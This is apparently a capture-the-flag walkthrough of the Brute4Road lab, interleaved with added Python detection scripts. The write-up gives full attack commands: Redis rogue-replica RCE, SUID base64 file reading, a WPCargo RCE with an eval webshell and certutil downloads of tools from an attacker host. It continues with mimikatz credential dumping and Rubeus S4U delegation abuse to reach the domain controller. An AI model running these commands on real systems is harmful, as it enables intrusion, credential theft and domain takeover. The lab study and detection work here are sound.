春秋云境-Brute4Road

flag01

[2025-03-09 20:26:33] [INFO] 暴力破解线程数: 1
[2025-03-09 20:26:33] [INFO] 开始信息扫描
[2025-03-09 20:26:33] [INFO] 最终有效主机数量: 1
[2025-03-09 20:26:33] [INFO] 开始主机扫描
[2025-03-09 20:26:34] [INFO] 有效端口数量: 233
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:6379
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:21
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:80
[2025-03-09 20:26:34] [SUCCESS] 端口开放 39.98.127.86:22
[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:21 => [ftp] 版本:3.0.2 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.2).]
[2025-03-09 20:26:34] [SUCCESS] 服务识别 39.98.127.86:22 => [ssh] 版本:7.4 产品:OpenSSH 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_7.4.]
[2025-03-09 20:26:39] [SUCCESS] 服务识别 39.98.127.86:6379 => [redis] 版本:5.0.12 产品:Redis key-value store
[2025-03-09 20:26:39] [SUCCESS] 服务识别 39.98.127.86:80 => [http] 版本:1.20.1 产品:nginx
[2025-03-09 20:26:43] [INFO] 存活端口数量: 4
[2025-03-09 20:26:43] [INFO] 开始漏洞扫描
[2025-03-09 20:26:43] [INFO] 加载的插件: ftp, redis, ssh, webpoc, webtitle
[2025-03-09 20:26:43] [SUCCESS] 网站标题 http://39.98.127.86 状态码:200 长度:4833 标题:Welcome to CentOS
[2025-03-09 20:26:44] [SUCCESS] 匿名登录成功!
[2025-03-09 20:26:46] [SUCCESS] Redis 39.98.127.86:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
[2025-03-09 20:26:50] [SUCCESS] Redis无密码连接成功: 39.98.127.86:6379
[2025-03-09 20:27:06] [SUCCESS] 扫描已完成: 5/5

Attack Redis via master-replica replication with RabR:

python3 redis-attack.py -r 39.98.127.86 -L xxx -P 8088 -b

Run the command and the shell comes back.
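As an added example (not from the original writeup or the RabR tool): a log-side check a defender can run over redis-server logs to spot the rogue-replica technique used above, where the instance is pointed at an attacker-controlled master and then loads a module from the synced file. The log lines, the allowed-master set and the helper names are constructed for illustration.

```python
import re
from typing import Dict, List

# Constructed redis-server log excerpt ("pid:role date time level message" layout).
# Illustrative only, not captured from the lab host.
SAMPLE_LOG = """\
1021:M 09 Mar 2025 20:30:01.102 * Ready to accept connections
1021:S 09 Mar 2025 20:31:10.417 * REPLICAOF 10.10.10.10:8088 enabled (user request from 'id=7 addr=10.10.10.10:51234 fd=9 name= age=1 idle=0 flags=N db=0')
1021:S 09 Mar 2025 20:31:10.418 * Connecting to MASTER 10.10.10.10:8088
1021:S 09 Mar 2025 20:31:10.420 * MASTER <-> REPLICA sync started
1021:S 09 Mar 2025 20:31:10.901 * MASTER <-> REPLICA sync: Finished with success
1021:S 09 Mar 2025 20:31:11.005 * Module 'system' loaded from /tmp/exp.so
"""

LINE_RE = re.compile(r"^(?P<pid>\d+):(?P<role>[MSCX]) (?P<ts>\d\d \w{3} \d{4} [\d:.]+) (?P<lvl>[.\-*#]) (?P<msg>.*)$")
REPLICAOF_RE = re.compile(r"^REPLICAOF (?P<host>[^:]+):(?P<port>\d+) enabled \(user request from '(?P<client>[^']*)'\)")
MODULE_RE = re.compile(r"^Module '(?P<name>[^']+)' loaded from (?P<path>\S+)")

def detect_rogue_replication(log_text: str, allowed_masters: set,
                             allowed_module_dirs=("/usr/local/lib/redis/modules/",)) -> List[Dict]:
    """Flag REPLICAOF to a master outside the allowlist and module loads from unexpected paths.
    The pair (unknown master, then a module loaded from /tmp or similar) is the signature of
    the rogue-server replication technique. Mitigations: requirepass, bind to a private
    interface, protected-mode yes, and rename-command REPLICAOF/SLAVEOF/MODULE to "".
    """
    findings = []
    rogue_master = None
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        msg = m["msg"]
        r = REPLICAOF_RE.match(msg)
        if r:
            master = f"{r['host']}:{r['port']}"
            if master not in allowed_masters:
                rogue_master = master
                addr = next((t for t in r["client"].split() if t.startswith("addr=")), "")
                findings.append({"ts": m["ts"], "type": "replicaof_unknown_master",
                                 "master": master, "client": addr})
            continue
        mod = MODULE_RE.match(msg)
        if mod and not mod["path"].startswith(allowed_module_dirs):
            findings.append({"ts": m["ts"], "type": "module_load_unexpected_path",
                             "module": mod["name"], "path": mod["path"],
                             "after_rogue_replicaof": rogue_master is not None})
    return findings
```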

[redis@centos-web01 tmp]$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pam_timestamp_check
/usr/sbin/usernetctl
/usr/sbin/unix_chkpwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/base64
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/crontab
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/pkexec
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/lib/polkit-1/polkit-agent-helper-1

The SUID bit on base64 can be used for privilege escalation (it reads files as root):

base64 "/home/redis/flag/flag01" | base64 --decode
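An added example, not part of the original writeup: the defensive counterpart of the find command above, enumerating set-uid files and diffing them against a baseline so an odd entry such as /usr/bin/base64 stands out. The baseline is the listing above minus base64; the helper names are mine.

```python
import os
import stat
import tempfile
from typing import Iterable, List

# Baseline of SUID binaries expected on this CentOS host: the listing above without base64,
# which has no legitimate reason to be set-uid (assumed baseline for this example).
EXPECTED_SUID = {
    "/usr/sbin/pam_timestamp_check", "/usr/sbin/usernetctl", "/usr/sbin/unix_chkpwd",
    "/usr/bin/at", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/chage",
    "/usr/bin/umount", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/sudo", "/usr/bin/crontab",
    "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/pkexec",
    "/usr/libexec/dbus-1/dbus-daemon-launch-helper", "/usr/lib/polkit-1/polkit-agent-helper-1",
}
# What `find / -perm -u=s -type f` reported on centos-web01 (from the listing above).
OBSERVED_ON_WEB01 = sorted(EXPECTED_SUID | {"/usr/bin/base64"})

def find_suid(root: str = "/") -> List[str]:
    """Walk `root` and return regular files carrying the set-uid bit (same as the find above)."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unexpected_suid(found: Iterable[str], baseline=EXPECTED_SUID) -> List[str]:
    """SUID files not in the baseline; each one is a root-privilege primitive to review or strip
    (chmod u-s) and to alert on when it appears."""
    return sorted(set(found) - set(baseline))

def self_check() -> bool:
    """Create a temp file with the set-uid bit and confirm find_suid() reports exactly it."""
    d = tempfile.mkdtemp()
    p = os.path.join(d, "suid-test")
    open(p, "w").close()
    os.chmod(p, 0o4755)
    if not os.lstat(p).st_mode & stat.S_ISUID:
        return True  # filesystem dropped the bit; nothing to verify on this host
    return find_suid(d) == [p]
```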

fscan -h 172.22.2.7/24 -eh 127.22.2.7

flag02

http://172.22.2.18 runs WordPress.

GitHub - biulove0x/CVE-2021-25003: WPCargo < 6.9.0 - Unauthenticated RCE

After exploiting it, run:

http://172.22.2.18/wp-content/wp-conf.php?1=system
POST: 2=echo "<?php @eval(\$_POST[1]);?>" >> 1.php

wpuser:WpuserEha8Fgj9

That gives a username and password.

Not sure whether this one uses mysql or mysqli.

Got flag02.

flag03

Then the S0meth1ng_y0u_m1ght_1ntereSted entry is presumably the password it gives you. Take it and run a round against the SQL Server on 1433.

The stupid part is that none of the passwords in there worked at all; only after searching online did I find out they were wrong:

zyUO1njo
zyPKqVud
Zym5nlcG
ZxvkDGIH
zxa5BGTo
ZVTlQGUc
zuvo1OFm
zujJ9Zci
ztoxp803
zPMDqLBm
zpcaOJen
ZmkVdzer
zlbtFLVe
zJYG1iWb
ZIAu8fkt
zHquA2L9
ZHat2Wfi
ZgUEfMT9
zFW5jMCq
ZfF7L6Ka
# the ones above are what it gave; the one below is the correct one...
ElGNkOiC

Connect directly with mdut. Insufficient privileges.

Download files with certutil:

certutil.exe -urlcache -split -f http://172.22.2.7:8888/windows_x64_agent.exe C:/Users/Public/windows_x64_agent.exe
certutil.exe -urlcache -split -f http://172.22.2.7:8888/SweetPotato.exe C:/Users/Public/SweetPotato.exe
C:/Users/Public/SweetPotato.exe -a "whoami"
C:/Users/Public/SweetPotato.exe -a "C:/Users/Public/windows_x64_agent.exe -c 172.22.2.7:8091 -s 1234 --reconnect 8"

Bring it online through stowaway.

The output is garbled, so switch the code page:

chcp 65001

There is a domain environment:

net user /domain

First try adding a user directly:

net user natro92 123qwe!@# /add
net localgroup administrators natro92 /add

Then connect to it.

flag04

I didn't really know how to attack the domain after this, so I followed a writeup from the internet.

MSSQLSERVER has constrained delegation configured to the domain controller, so S4U can be used to forge a high-privilege service ticket (ST) and take the DC. It also seems that only its NTLM hash is usable, so we use Rubeus to request a service ticket for itself.

Run mimikatz as administrator and get the plaintext credentials:

privilege::debug
sekurlsa::logonpasswords
* Username : MSSQLSERVER$
* Domain : XIAORANG
* NTLM : 78aa7721aeb225c7495de5a172e0e238
* SHA1 : 70dabce165b520d598a4ad251db5ebf919aea686

https://github.com/GhostPack/Rubeus

Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:78aa7721aeb225c7495de5a172e0e238 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap

Inject the ticket:

Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3/h5OLVOREp9Ul5Ta+XJsueLtKMXRh9nV/PgZexdCp8jG7cVDwhop7nyhbES4z4HgT37XpMqg/Kj61HIZ3iGtsdEI6zAy5nSUOHm63VOMXqny83byqvtXrOrONzBfhvsgg0mRL9O8jlaUFv1WXOE1ZipuNN07hBQwWonmCjgA1ZeCXMNvb4ZQBEcrD+o84txLQ7ml5MsbTRIn3dctRjGY6/TviJHJ7ieUmRWiCE/pI+3niWDvBhdGtDxjJ4Rb6gPaOF52ZGHFtHeTOWLWMnG750vu0t1794vWbE+Ulad1PdCACbknnCbGymJzMAHmyQiHDYFJN3OEaiKey8FeeKg53TWTmVEMh55wbm1V1XGZpZ8U5LEzgAonxaMVDISHJgRzswx6EV1bFDA6kc8QPCYZ9BN/NTlH57hnkwrGslByld0BGnmUJI1Te6W1ii32QsirNU0LmOoXT1sTYuy0eGWrcNWdYJhrnLy0BOkYtkwKHOpPP2aZQ5zqSCQLfsCKVK3nLZpj+27dpccIZ+HK+beZEwDd64bopsxsWbWqZd1oU8q7aX+bE5wd3zcgP8OZBS28cSx4KHfg7J4r0raq7dprA41Db1qbuXjD73Hk/W3pTawODEUSgIofNfAW+tHdLHXrXa8+VCNtELk3nd17zuTR0eH6TIvRp1ySDmpSP8BHyvwml+rR+2Av3NI+QhffTwGTEYP3dv9NbNfEWQKTDy26VnHwhlb/nGkvCEXxwA9V4Dm35WtQwqQWu6g82U0BJgVtFoMWiUbAbFqfmX2hU+ZrTNIA5l807gznC0WBZvoTp+2q3HgALaSs2LMuyOS5fbPN1gsCTuMO4k8KJo8x5kpxBT7Rrrh/3KWsBSbZ9fSFpovXsWUbQHRre6/bdbCttV7gVXIl9SKlLG6J7RtJLPUcjmY1k1KsiJMRx3Pv4Va2DagR9WLohvlpwbjkPaBni3pyU4s4m03ZgtLgmhdpRnwIZk6Cj14ThS5t60aFSvTYL/7r77TwylkrYTxyVMVnmlyNjCk39Sdws5BAwkaOTiNHRCjXt6kzGAZa2pBbJXjrcxecX8PZgSIbzFt3zsGYwxZQu87723UBM3hTz/5BvWUY3o4LVpdOQo+8e7mcGruojNRtWwv0xJafj2Fvo3yhQkc9xHl4pAJX3XEIYaqfVuel9Sk5ge3nGGaxhLw//f4Xw2neG2F7rEKUAT+Eov9/7mYGjo4xK9JzKSlFr6KT4km2o8bg+gkODa98JdiTG6xadjcfVq5dSKaRaJlLDN7jE5bsjlwn+Cpm+smHLR64TH1KF/0IuAJKQBtiLJFByy8w9YZUdEpbSYDQcxGXHgOy0svvfDxJdnD1TK6BnUwxxhSGhDXthpcvW9f7JeHM/0uzIQC/5YjiOa6UmGWQKsnk9T39kALdmjkS8vfjBkPRGuEyotnVSshc88mJe9ZF/dBEpDe4N1m80bO1wpG8N5FujgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCcD9EEnXg39mxbQjtdzNnHoQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDI1MDMwOTE0MDE0MlqmERgPMjAyNTAzMTAwMDAxNDJapxEYDzIwMjUwMzE2MTQwMTQyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZ
rcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
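Added example, not from the writeup or the Rubeus project: detection logic over constructed Windows Security 4769 (Kerberos service ticket requested) events for the S4U2Proxy hop performed above, where the delegating account shows up in TransitedServices while the ticket is issued for Administrator to the DC. The delegation policy map is an assumption standing in for the real msDS-AllowedToDelegateTo values; the events and helper names are mine.

```python
from typing import Dict, Iterable, List

# Constructed 4769 events as a SIEM might normalise them. Field names follow the 4769
# schema; the values are illustrative, not captured from the lab.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "4769", "TargetUserName": "wpuser@XIAORANG.LAB", "ServiceName": "FS01$",
     "TransitedServices": "-", "IpAddress": "172.22.2.18"},
    # S4U2Proxy hop: MSSQLSERVER$ obtains a ticket *as* Administrator to the DC, i.e. the
    # ticket the Rubeus s4u step above produces. TransitedServices names the delegator.
    {"EventID": "4769", "TargetUserName": "Administrator@XIAORANG.LAB", "ServiceName": "DC$",
     "TransitedServices": "MSSQLSERVER$@XIAORANG.LAB", "IpAddress": "172.22.2.15"},
    # Same account delegating to a service that is not in its permitted list.
    {"EventID": "4769", "TargetUserName": "wpuser@XIAORANG.LAB", "ServiceName": "FS01$",
     "TransitedServices": "MSSQLSERVER$@XIAORANG.LAB", "IpAddress": "172.22.2.15"},
]

# Defender-maintained policy: delegating account -> service accounts it may delegate to,
# derived from msDS-AllowedToDelegateTo (assumed mapping for this example).
ALLOWED_DELEGATION = {"mssqlserver$": {"dc$"}}
PRIVILEGED_USERS = {"administrator"}

def detect_s4u2proxy_abuse(events: Iterable[Dict[str, str]], allowed=ALLOWED_DELEGATION,
                           privileged=PRIVILEGED_USERS) -> List[Dict[str, str]]:
    """One alert per 4769 event that carries a delegation hop (non-empty TransitedServices)
    and either targets a service outside policy or impersonates a privileged user."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4769":
            continue
        transited = ev.get("TransitedServices", "-")
        if transited in ("", "-"):
            continue  # plain TGS-REQ, no delegation involved
        delegator = transited.split("@")[0].lower()
        impersonated = ev["TargetUserName"].split("@")[0].lower()
        target = ev["ServiceName"].lower()
        base = {"delegator": delegator, "impersonated": impersonated, "target": target,
                "source_ip": ev.get("IpAddress", "")}
        if target not in allowed.get(delegator, set()):
            alerts.append({"rule": "delegation_outside_policy", **base})
        if impersonated in privileged:
            # Constrained delegation to a DC lets the delegator act as any user not marked
            # "sensitive and cannot be delegated"; admins belong in Protected Users.
            alerts.append({"rule": "privileged_user_impersonated", **base})
    return alerts
```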